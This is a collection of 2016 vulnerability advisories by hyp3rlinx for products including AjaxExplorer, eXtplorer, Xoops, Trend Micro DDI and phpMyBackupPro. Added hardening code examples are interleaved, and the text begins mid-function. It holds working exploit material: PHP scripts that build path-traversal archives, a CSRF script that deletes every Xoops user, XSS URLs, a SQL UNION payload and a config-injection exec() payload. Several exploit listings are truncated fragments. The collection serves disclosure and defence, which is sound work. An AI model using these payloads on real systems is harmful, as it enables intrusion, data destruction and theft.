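    // Relative URL (no scheme, no host) stays on this site.
    if (!isset($p['scheme']) && !isset($p['host'])) {
        return true;
    }
    // "//host/path" parses with a host but no scheme; only absolute http(s) passes.
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || !isset($p['host'])) {
        return false;
    }
    // "https://victim-server@attacker-server/" puts the trusted name in the
    // userinfo part; refuse any URL carrying credentials.
    if (isset($p['user']) || isset($p['pass'])) {
        return false;
    }
    $host    = strtolower(rtrim($p['host'], '.'));
    $allowed = array_map('strtolower', array_merge([$selfHost], $trustedDomains));
    return in_array($host, $allowed, true);
}

// Constructed inputs: the two advisory PoC targets plus common bypass shapes.
$self    = 'victim-server';
$trusted = ['sp.example.org'];
$cases = [
    '/simplesaml/module.php/core/frontpage_welcome.php',   // relative path
    'https://victim-server/simplesaml/logout.php',        // same host
    'https://sp.example.org/after-logout',                 // listed domain
    'https://attacker-server',                             // advisory PoC 1
    'http://attacker-server/Evil.php',                     // advisory PoC 2
    '//attacker-server/x',                                 // protocol-relative
    'https://victim-server@attacker-server/',              // userinfo before the real host
    'javascript:alert(1)',                                 // non-http scheme
    '\\\\attacker-server/x',                               // backslash form of //
];
foreach ($cases as $c) {
    printf("%-55s %s\n", $c, is_trusted_url($c, $self, $trusted) ? 'allowed' : 'rejected');
}
```

Exact host matching is intentional: a suffix match such as "ends with example.org" accepts attackerexample.org, and a substring match accepts example.org.attacker.net. If subdomains must be allowed, match on a leading "." explicitly.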
AjaxExplorer v1.10.3.2 Remote CMD Execution / CSRF / Persistent XSS

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
[+] ISR: apparitionsec

Vendor: sourceforge.net smsid
Download link: sourceforge.net/projects/ajax-explorer/files/

Product: AjaxExplorer v1.10.3.2
Manage server files through a simple Windows-like interface.

Vulnerability Type:
Remote Command Execution
CSRF
Persistent XSS

CVE Reference: N/A

Vulnerability Details:
AjaxExplorer has a command terminal feature with which you can move, copy, delete files etc.; it also lets a user save commands in a flat file named "terminal" under their user profile "/ae.user/owner/myprofile".

e.g.
copy [FILEPATH + FILENAME] [FILEPATH]
create [FILEPATH + FILENAME]

Since AjaxExplorer also suffers from a CSRF vulnerability, we can exploit the application by first creating an .htaccess file with an "allow from all" directive to bypass access restrictions, then creating arbitrary PHP files for remote command execution. This exploit requires two consecutive HTTP requests, so we target an iframe to stay on the same page until the exploit is completed.

Exploit code(s):
1) The first POST request creates the .htaccess file so we can bypass directory browsing restrictions.
2) The second POST writes our remote command execution file, which we then access to execute commands on the victim system.
The P:/ value for the "strPath" form field stands for "Profile".

http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; method="post"> document.getElementById('htaccess').submit()
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php; method="post"> document.getElementById('RCE').submit()

Now we can access the file and run arbitrary commands:
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c:\\Windows\\system32\\calc.exe

Here is another way to get RCE on this application: first create the PHP file, then edit it.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()

Persistent XSS:
We can also write a persistent XSS payload to the user profile "terminal" file.
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php;> document.getElementById('XSS').submit()

Disclosure Timeline:
Vendor Notification: NA
June 1, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: 8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

hyp3rlinx
dns_dhcp Web Interface SQL Injection

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec

Vendor: tmcdos / sourceforge
Product: dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in DNSmasq and Mikrotik. It generates config files for DNSmasq and uses the RouterOS API to manage Mikrotik. Network devices (usually PCs) are separated into subnets by department and use triplets (hostname, MAC address, IP address) for identification. Information is stored in MySQL.

Vulnerability Type: SQL Injection
CVE Reference: N/A

Vulnerability Details:
The 'net' HTTP POST parameter of the dns.php script is not checked or sanitized and is used directly in a MySQL query, allowing an attacker to exfiltrate any data from the backend database using SQL injection.

1) Line 239 of dns.php:
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);

2) dns.php line 187, the a_select function, where the 2nd argument $_REQUEST['net'] is passed as $clause, concatenated into the query and executed on line 194 by mysql_query($query). The "$clause==0" guard does not stop the injection: a payload such as "-1 UNION SELECT ..." is not equal to 0.

function a_select($tbl,$clause,$field='',$where='')
{
    if ($clause==0) return '';
    if($field=='') $field=$tbl;
    $query = "SELECT $field FROM $tbl WHERE ";
    if($where=='') $query.='ID='.$clause;
    else $query.=$where;
    $res = mysql_query($query) or trigger_error($query.''.mysql_error(),E_USER_ERROR);
    if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
    else return '';
}

Exploit code(s):
Run from CL...

Disclosure Timeline:
Vendor Notification: NA
May 14, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'

hyp3rlinx
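The a_select() function quoted above concatenates the 'net' value into the WHERE clause, and its "$clause==0" guard does not help because a string such as "-1 UNION SELECT ..." compares unequal to 0. The following is an added example, not dns_dhcp code, that reproduces that pattern against an in-memory SQLite database via PDO (an assumption: the real application uses the mysql_* extension) so the injection and a parameterized fix can be exercised without a MySQL server. The schema, the rows and the payload are constructed.

```php
<?php
// Added example, not dns_dhcp code. Reproduces the a_select() pattern from the
// advisory against in-memory SQLite (PDO; the real app uses mysql_*), then the
// fixed version. Table/column names, rows and the 'net' payload are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE SUBNET (ID INTEGER PRIMARY KEY, SUBNET TEXT)");
$db->exec("CREATE TABLE users  (ID INTEGER PRIMARY KEY, login TEXT, password TEXT)");
$db->exec("INSERT INTO SUBNET VALUES (1, 'Accounting'), (2, 'Engineering')");
$db->exec("INSERT INTO users  VALUES (1, 'admin', 's3cret-hash')");

// Vulnerable: $clause (= $_REQUEST['net']) is concatenated into the WHERE clause.
// The guard "if ($clause==0) return ''" does not fire for "-1 UNION ..." because
// that string is not equal to 0 under either PHP 7 or PHP 8 comparison rules.
function a_select_vulnerable(PDO $db, string $tbl, $clause, string $field = ''): string {
    if ($clause == 0) return '';
    if ($field === '') $field = $tbl;
    $query = "SELECT $field FROM $tbl WHERE ID=" . $clause;
    $row = $db->query($query)->fetch(PDO::FETCH_NUM);
    return $row ? (string) $row[0] : '';
}

// Hardened: the id is bound as a parameter, so it can only ever be a value.
// Identifiers ($tbl, $field) cannot be bound, so they are checked against an
// allow-list of known tables and columns instead.
function a_select_hardened(PDO $db, string $tbl, $clause, string $field = ''): string {
    static $schema = ['SUBNET' => ['ID', 'SUBNET']];
    if ($field === '') $field = $tbl;
    if (!isset($schema[$tbl]) || !in_array($field, $schema[$tbl], true)) {
        throw new InvalidArgumentException('unknown table or field');
    }
    if (!ctype_digit((string) $clause)) {
        return '';   // 'net' is a row id; anything that is not a plain integer is refused
    }
    $stmt = $db->prepare("SELECT $field FROM $tbl WHERE ID = :id");
    $stmt->execute([':id' => (int) $clause]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row ? (string) $row[0] : '';
}

// Constructed value of the 'net' POST parameter: a UNION that pulls a row from
// another table into the single cell a_select() returns.
$net = "-1 UNION SELECT password FROM users WHERE login='admin'";

echo "legit  vulnerable: ", a_select_vulnerable($db, 'SUBNET', '1'), "\n";
echo "attack vulnerable: ", a_select_vulnerable($db, 'SUBNET', $net), "\n";
echo "legit  hardened:   ", a_select_hardened($db, 'SUBNET', '1'), "\n";
echo "attack hardened:   '", a_select_hardened($db, 'SUBNET', $net), "'\n";
```

Because a_select() returns only the first column of the first row, the injection above exfiltrates one value per request; the same shape with LIMIT/OFFSET, or an error-based variant exploiting the trigger_error() call that echoes the failed query, walks the rest of the database.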
eXtplorer v2.1.9 Archive Path Traversal

[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
[+] ISR: apparitionsec

Vendor: extplorer.net
Product: eXtplorer v2.1.9
eXtplorer is a PHP and Javascript-based File Manager. It allows to browse directories, edit, copy, move, delete, search, upload and download files, create & extract archives, create new files and directories, change file permissions (chmod) and more. It is often used as an FTP extension for popular applications like Joomla.

Vulnerability Type: Archive Path Traversal
CVE Reference: CVE-2016-4313

Vulnerability Details:
The eXtplorer unzip/extract feature allows path traversal: decompressed files can be placed outside the intended target directory if an entry name in the archive contains "../". This can result in files like ".htaccess" being overwritten, or in RCE / backdoor exploits.

Tested on Windows

Reproduction steps:
1) Generate an archive using the PHP script below
2) Upload it to eXtplorer and then extract it
3) Check the directory for the default 'RCE.php' file, or use the CL switch to overwrite files like .htaccess

Exploit code(s):
Run the PHP script below from the CL...

[evil-archive.php]
<?php
, , ";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='';
if(!empty($argv[2])&&is_numeric($argv[2])){
    $depth=$argv[2];
}else{
    echo "Second flag must be numeric!, you supplied '$argv[2]'";
    exit();
}
if(strtolower($argv[3])!="y"){
    if(!empty($argv[3])){
        $exploit_file=$argv[3];
    }
    if(!empty($argv[4])){
        $cmd=$argv[4];
    }else{
        echo "Usage: enter a payload for file $exploit_file wrapped in double quotes";
        exit();
    }
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo " by hyp3rlinx ===";
?>

[Script examples]
Use the default RCE.php by passing the "y" flag, creating DOOM.zip with a path depth of 2 levels:
c:\>php evil-archive.php DOOM 2 Y

Create DOOM.zip with a path depth of 4 levels and an .htaccess file to overwrite the one on the system:
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"

Disclosure Timeline:
Vendor Notification: No reply
May 14, 2016 : Public Disclosure

Exploitation Method: Local
Severity Level: Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

hyp3rlinx
CAM UnZip v5.1 Archive Directory Traversal

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt

Vendor: www.camunzip.com
Product: CAM UnZip v5.1

Vulnerability Type: Archive Path Traversal
CVE Reference: N/A

Vulnerability Details:
CAM UnZip fails to check that the paths of the files in an archive do not traverse out of the target directory when uncompressing. Specially crafted entries whose names contain '..\' can overwrite files on the filesystem by backtracking, or allow attackers to place malicious files outside the target unzip directory, which may lead to remote command execution exploits etc.

Tested successfully on Windows 7

Exploit code(s):
Malicious archive script...

<?php
";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();
echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>

Result:
Creating Folder: C:\Test\BOZO
Extracting Files From: C:\Test\BOZO.zip
Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
1 file was Extracted.
C:\RCE.php

Exploitation Technique: Local
Severity Level: Medium

hyp3rlinx
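The eXtplorer and CAM UnZip advisories above are the same bug class (archive entry names containing ".." escaping the extraction directory). The following is an added example, not code from either product: it first builds an archive the way their PoC scripts do, then extracts it with an entry-by-entry path check that refuses anything which would land outside the destination. It does not rely on whatever sanitization the library's own extractTo() performs. The scratch paths and entry names are constructed.

```php
<?php
// Added example, not eXtplorer or CAM UnZip code. Builds a traversal archive as
// the advisories' PoC scripts do, then extracts it safely. Paths are constructed.

function build_traversal_zip(string $zipPath, int $depth, string $name, string $content): void {
    $zip = new ZipArchive();
    if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
        throw new RuntimeException("cannot create $zipPath");
    }
    $zip->addFromString(str_repeat('..\\', $depth) . $name, $content);  // as in the PoCs
    $zip->addFromString('readme.txt', 'harmless entry');
    $zip->close();
}

// Extracts every entry of $zipPath under $destDir. Returns the entries written;
// throws on the first entry that would resolve outside $destDir.
function safe_extract(string $zipPath, string $destDir): array {
    $dest = realpath($destDir);
    if ($dest === false || !is_dir($dest)) {
        throw new RuntimeException("destination $destDir does not exist");
    }
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open $zipPath");
    }
    $written = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = $zip->getNameIndex($i);
        // Normalise separators (a Windows tool writes ..\ into the archive), then
        // reject absolute paths, drive letters and any '..' segment outright.
        $norm = str_replace('\\', '/', $entry);
        if ($norm === '' || $norm[0] === '/' || preg_match('/^[A-Za-z]:/', $norm)
            || in_array('..', explode('/', $norm), true)) {
            $zip->close();
            throw new RuntimeException("refusing traversal entry: $entry");
        }
        $target = $dest . '/' . $norm;
        // Independent second check: the resolved parent directory must still be
        // $dest or below it (catches symlinks and anything the first check missed).
        $parent = dirname($target);
        if (!is_dir($parent) && !mkdir($parent, 0700, true)) {
            $zip->close();
            throw new RuntimeException("cannot create $parent");
        }
        $rp = realpath($parent);
        if ($rp === false || ($rp !== $dest && strpos($rp, $dest . DIRECTORY_SEPARATOR) !== 0)) {
            $zip->close();
            throw new RuntimeException("resolved outside destination: $entry");
        }
        if (substr($norm, -1) === '/') {
            continue;   // directory entry, already created above
        }
        file_put_contents($target, $zip->getFromIndex($i));
        $written[] = $norm;
    }
    $zip->close();
    return $written;
}

// Demonstration in a scratch directory: depth 2 mirrors "php evil-archive.php DOOM 2 Y".
$base = sys_get_temp_dir() . '/zipslip_demo_' . getmypid();
mkdir("$base/extract", 0700, true);
$zipPath = "$base/DOOM.zip";
build_traversal_zip($zipPath, 2, 'RCE.php', '<?php echo "pwned"; ?>');

try {
    $files = safe_extract($zipPath, "$base/extract");
    echo "extracted: ", implode(', ', $files), "\n";
} catch (RuntimeException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
echo file_exists("$base/RCE.php") ? "RCE.php landed outside the target dir\n"
                                  : "nothing written outside $base/extract\n";
```

The two checks are deliberately redundant. The lexical check is cheap and catches the advisories' payloads before any filesystem call; the realpath() comparison is what protects against entries that are lexically clean but point through a symlink already present under the destination. Either check alone is the kind of single point of failure that let both products write C:\RCE.php.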
WPN-XM Serverstack v0.8.6 CSRF - MySQL / PHP.INI Hijacking

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt

Vendor: wpn-xm.org
Product: WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform.

Vulnerability Type: CSRF - MySQL / PHP.INI Hijacking
CVE Reference: N/A

Vulnerability Details:
WPN-XM's web interface is prone to multiple CSRF entry points, allowing remote attackers to compromise an authenticated user who visits a malicious webpage or clicks an attacker-supplied link. Attackers can modify the 'PHP.INI' file to change arbitrary PHP settings, for example enabling 'allow_url_include', or change the default MySQL username and password settings.

Exploit code(s):

1) Hijack MySQL Account Default Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-Username').submit()
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-MySQL-PWD').submit()

2) Hijack PHP.INI Settings
http://localhost/tools/webinterface/index.php?page=config=update-phpini-setting;> document.getElementById('CSRF-PHP-INI').submit()

Disclosure Timeline:
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: Medium

hyp3rlinx
WPN-XM Serverstack v0.8.6 XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-XSS.txt

Vendor:
wpn-xm.org

Product:
WPN-XM Serverstack for Windows - Version 0.8.6

WPN-XM is a free and open-source web server solution stack for professional PHP development on the Windows platform.

Vulnerability Type:
Cross Site Scripting - XSS

CVE Reference:
N/A

Vulnerability Details:
WPN-XM's webinterface has cross site scripting security issues allowing remote attackers to execute client side code in the security context of the targeted domain, undermining the trust between server & client. XSS attacks can result in data theft, session hijacking etc.

Exploit code(s):

XSS 1
http://localhost/tools/webinterface/index.php?page=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E

XSS 2
http://localhost/tools/webinterface/index.php?action=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E

XSS 3
http://localhost/tools/webinterface/index.php?page=config=showtab=%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E

Disclosure Timeline:
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
Low

hyp3rlinx
TrendMicro DDI Cross Site Request Forgeries
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt

Vendor:
www.trendmicro.com

Product:
Trend Micro Deep Discovery Inspector V3.8, 3.7

Deep Discovery Inspector is a network appliance that gives you 360-degree network monitoring of all traffic to detect all aspects of a targeted attack.

Vulnerability Type:
Cross Site Request Forgery - CSRF

CVE Reference:
N/A

Vulnerability Details:
Trend Micro Deep Discovery suffers from multiple CSRF vectors; if an authenticated user visits a malicious webpage, attackers will have the ability to modify many settings of the Deep Discovery application to those of the attacker's choosing.

Reference: http://esupport.trendmicro.com/solution/en-US/1113708.aspx

Trend Micro DDI is affected by CSRF vulnerabilities. These affect the following console features:
Deny List
Notifications
Detection Rules
Threat Detections
Email Settings
Network Blacklisting/Whitelisting
Time
Accounts
Power Off / Restart

DETAILS
The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are affected:
3.8 English
3.8 Japanese
3.7 English
3.7 Japanese
3.7 Simplified Chinese

Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue.

Exploit code(s):

1) Shut down all threat scans and malicious file submissions under: Administration / Monitoring / Scanning / Threat Detections
https://localhost/php/scan_options.php; method="post">
document.getElementById('CSRF-ThreatScans').submit()

2) Whitelist C&C server, menu location: Detections / C&C Callback Addresses
https://localhost/php/blacklist_whitelist_query.php; method="post">
document.getElementById('CSRF-Whitelist').submit()

3) Turn off or change email notifications
https://localhost/cgi-bin/mailSettings_set.cgi; method="post">
document.getElementById('CSRF-Notifications').submit()

4) Change system settings ( x.x.x.x = whatever IP we want )
https://localhost/cgi-bin/admin_ip.cgi; method="post">
document.getElementById('PWNED').submit()

Disclosure Timeline:
Vendor Notification: November 23, 2015
March 25, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8

by hyp3rlinx
Xoops 2.5.7.2 CSRF - Arbitrary User Deletions
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt

Vendor:
xoops.org

Product:
Xoops 2.5.7.2

Vulnerability Type:
CSRF - Arbitrary User Deletions

Vulnerability Details:
Xoops 2.5.7.2 has a CSRF vulnerability where remote attackers can delete ALL users from the Xoops database.

References:
http://xoops.org/modules/news/article.php?storyid=6757

Exploit Codes:
The following CSRF attack deletes all users from the database; the POC code below sequentially deletes 100 users from the Xoops application.

    var c=-1
    var amttodelete=100
    var id=document.getElementById("ids")
    var frm=document.getElementById("CSRF")

    function doit(){
        c++
        arguments[1].value=c
        arguments[0].submit()
        if(c>=amttodelete){
            clearInterval(si)
            alert("Done!")
        }
    }

    var si=setInterval(doit, 1000, frm, id)

Disclosure Date:
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure

(c) hyp3rlinx.
hyp3rlinx
Xoops 2.5.7.2 Directory Traversal Bypass
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt

Vendor:
xoops.org

Product:
Xoops 2.5.7.2

Vulnerability Type:
Directory Traversal Bypass

Vulnerability Details:
Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing "..././" instead of "../".

References:
http://xoops.org/modules/news/article.php?storyid=6757

Exploit Codes:
In the Xoops code in 'protector.php' the following check is made for dot dot slash "../" in HTTP requests:

    if( is_array( $_GET[ $key ] ) ) continue ;
    if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
        $this->last_error_type = 'DirTraversal' ;
        $this->message .= "Directory Traversal '$val' found.\n" ;

The above Xoops directory traversal check can be defeated by using ..././..././..././..././

You can test the theory with the test case below by supplying ..././ to the GET param.

    $val=$_GET['c'];
    if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) {
        echo "traversal!";
    }else{
        echo "ok!" . $val;
    }

Disclosure Date:
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure

(c) hyp3rlinx.
hyp3rlinx
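The check quoted above inspects the raw request string for "../" patterns, which is why a value that does not literally start with "../" or contain "../../" passes. The added example below (in Python, not Xoops code and not the project's fix) contrasts that approach with validating the canonical path. The advisory does not show what turns "..././" into a working traversal afterwards; the example assumes, as a labelled stand-in, a later sanitiser of the common str_replace('../', '', $val) form, which removes the inner "../" once and leaves "../" behind. The base directory and file names are constructed.

```python
"""Directory traversal: decide on the canonical path, not the raw string.

Added example, not code from Xoops or the advisory. The Xoops condition
quoted in the advisory flags a parameter only when it starts with '../' or
contains '../../', so '..././' is never flagged. The downstream sanitiser
modelled here is an assumption (the advisory does not show it): a single
non-recursive removal of '../', which turns '..././' back into '../'.
"""
import posixpath
from typing import Optional

# Constructed base directory for the demonstration.
BASE_DIR = "/var/www/xoops/uploads"


def xoops_style_check(val: str) -> bool:
    """Python rendering of the quoted Xoops condition. True means 'flagged'."""
    val = val.strip()
    return val.startswith("../") or "../../" in val


def naive_strip(val: str) -> str:
    """Assumed downstream sanitiser: one non-recursive removal of '../',
    like PHP's str_replace('../', '', $val). Deleting the middle '../' of
    '..././' leaves '../' behind, which is why deletion-based sanitisers
    cannot be trusted as the last word."""
    return val.replace("../", "")


def resolve_under_base(base: str, user_path: str) -> Optional[str]:
    """Join user_path to base, normalise '.' and '..' segments, and return
    the absolute path only if it is still inside base; otherwise None."""
    if not user_path or user_path.startswith("/") or "\0" in user_path:
        return None
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def vulnerable_pipeline(val: str) -> Optional[str]:
    """Pattern-check the raw value, sanitise afterwards, never look at the
    resolved path. Returns the path that would be opened, or None if blocked."""
    if xoops_style_check(val):
        return None
    return posixpath.normpath(posixpath.join(BASE_DIR, naive_strip(val)))


def hardened_pipeline(val: str) -> Optional[str]:
    """Same sanitiser, but the allow/deny decision is made on the canonical
    result, so whatever the sanitiser produces is what gets checked."""
    return resolve_under_base(BASE_DIR, naive_strip(val))


if __name__ == "__main__":
    for sample in ("images/a.png", "../", "..././..././file.txt"):
        print(f"{sample!r:26} flagged={xoops_style_check(sample)!s:5} "
              f"vulnerable={vulnerable_pipeline(sample)} "
              f"hardened={hardened_pipeline(sample)}")
```

The practical rule this illustrates: run every decoding and sanitising step first, then resolve the result against the intended directory and refuse anything that lands outside it. A pattern check on the raw input can only ever catch the spellings its author thought of.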
Microsoft PowerPointViewer Code Execution
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-PPT-VIEWER-CODE-EXEC.txt

Vendor:
www.microsoft.com

Product:
Microsoft PowerPoint Viewer version: 12.0.6600.1000

Vulnerability Type:
DLL Hijack Arbitrary Code Execution

Vulnerability Details:
Microsoft PowerPoint Viewer 'POWERPNT.EXE' will execute arbitrary code if an attacker can place a DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll" in the user's downloads directory. This exploit does NOT rely on any embedded OLE objects or CLSID registered COM objects in the document to execute.

1) create malicious DLL named "api-ms-win-appmodel-runtime-l1-1-0.dll"
2) place DLL in the user's downloads directory via download drive-by etc...
3) open an existing .PPT document from the downloads directory e.g. "C:\Users\Downloads\somefile.ppt" then BOM ...

Tested on: Windows 7 SP1 x64

Disclosure Timeline:
Vendor Notification: February 23, 2016
Vendor replies that the DLL side-loading issue is already publicly known. A Google search returned the following results:
1) examples using embedded OLE objects and MS Word etc
2) old posts
3) examples not referencing the "api-ms-win-appmodel-runtime-l1-1-0.dll" DLL
February 29, 2016 : Public Disclosure.

Severity Level:
High

Description:
vulnerable DLL: "api-ms-win-appmodel-runtime-l1-1-0.dll"
Vulnerable Product: Microsoft PowerPoint Viewer 'POWERPNT.EXE'

by hyp3rlinx
Re: Symantec EP DOS
*** Be aware "Gerado Sanchez" is re-posting and stealing vulnerability reports work/credits as his own, he is also using similar nicknames, emails etc. ORIGINAL Symantec EP DOS POST from "hyp3rlinx" is found here dated Jul 08 2015. http://www.securityfocus.com/archive/1/535958
CyberCop Scanner Smbgrind v5.5 Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt

Vendor:
Network Associates Inc.

Product:
smbgrind: NetBIOS parallel password grinder circa 1996-1999

smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to remotely crack SMB usernames and passwords, used to establish a login session to the remote NetBIOS file server. CyberCop was discontinued back in 2002.

usage: smbgrind -i [options]
    -r  Remote NetBIOS name of destination host
    -i  IP address of destination host
    -u  Name of userlist file (default NTuserlist.txt)
    -p  Name of password list file (default NTpasslist.txt)
    -l  Number of simultaneous connections (max: 50 default: 10)
    -v  Provide verbose output on progress

Vulnerability Type:
Buffer Overflow

CVE Reference:
N/A

Vulnerability Details:
Smbgrind.exe succumbs to a buffer overflow when supplied a large number of bytes (1206) for the -r switch (the remote NetBIOS name of the destination host), resulting in memory corruption that overwrites several registers...

GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x0040c421 in ?? ()
(gdb) info r
eax            0x3         3
ecx            0x41414141  1094795585
edx            0x41414141  1094795585
ebx            0x41414141  1094795585
esp            0x241e89c   0x241e89c
ebp            0x241e8a8   0x241e8a8
esi            0x401408    4199432
edi            0x41414141  1094795585
eip            0x40c421    0x40c421
eflags         0x10283     [ CF SF IF RF ]
cs             0x23        35
ss             0x2b        43
ds             0x2b        43
es             0x2b        43
fs             0x53        83
gs             0x2b        43
(gdb)

smbgrind core dump file...

(C:\smbgrind.exe 1000) exception C005 at 40C421
(C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141
(C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp 241F390
(C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION

hyp3rlinx
phpMyBackupPro v.2.5 Remote Command Execution / CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt

Vendor:
www.phpmybackuppro.net
project site: sourceforge.net/projects/phpmybackup/

Product:
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more.

Vulnerability Type:
Remote Command Execution / CSRF

CVE Reference:
N/A

Vulnerability Details:
phpMyBackupPro uses PHP configuration files (global_conf.php) to manage settings, allowing users to change things like the SQL host, language, email etc.. However, a malicious local user can also inject persistent arbitrary PHP/OS commands into the configuration to be executed on the host system. The remote command execution can also be the result of a CSRF drive-by if a currently logged-in admin visits an attacker's webpage.

Attackers can inject and write to disk arbitrary PHP code into the global_conf.php configuration file if a victim visits a malicious webpage or clicks an infected link via a CSRF vector, or additionally from a local malicious user in a shared-host type environment.

First we escape the single quotes etc... so we can close the expected entry, then we leverage the backtick "`" operator to have PHP execute OS commands on the victim's system, as it works just as well without having to deal with all the quote escaping.

e.g. payload that handles the single "'" quote and forward slashes "/"...

''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';

The above when injected will result in a write to $CONF variables in global_conf.php as follows...

$CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');

OR...

$CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');

Exploit code(s):
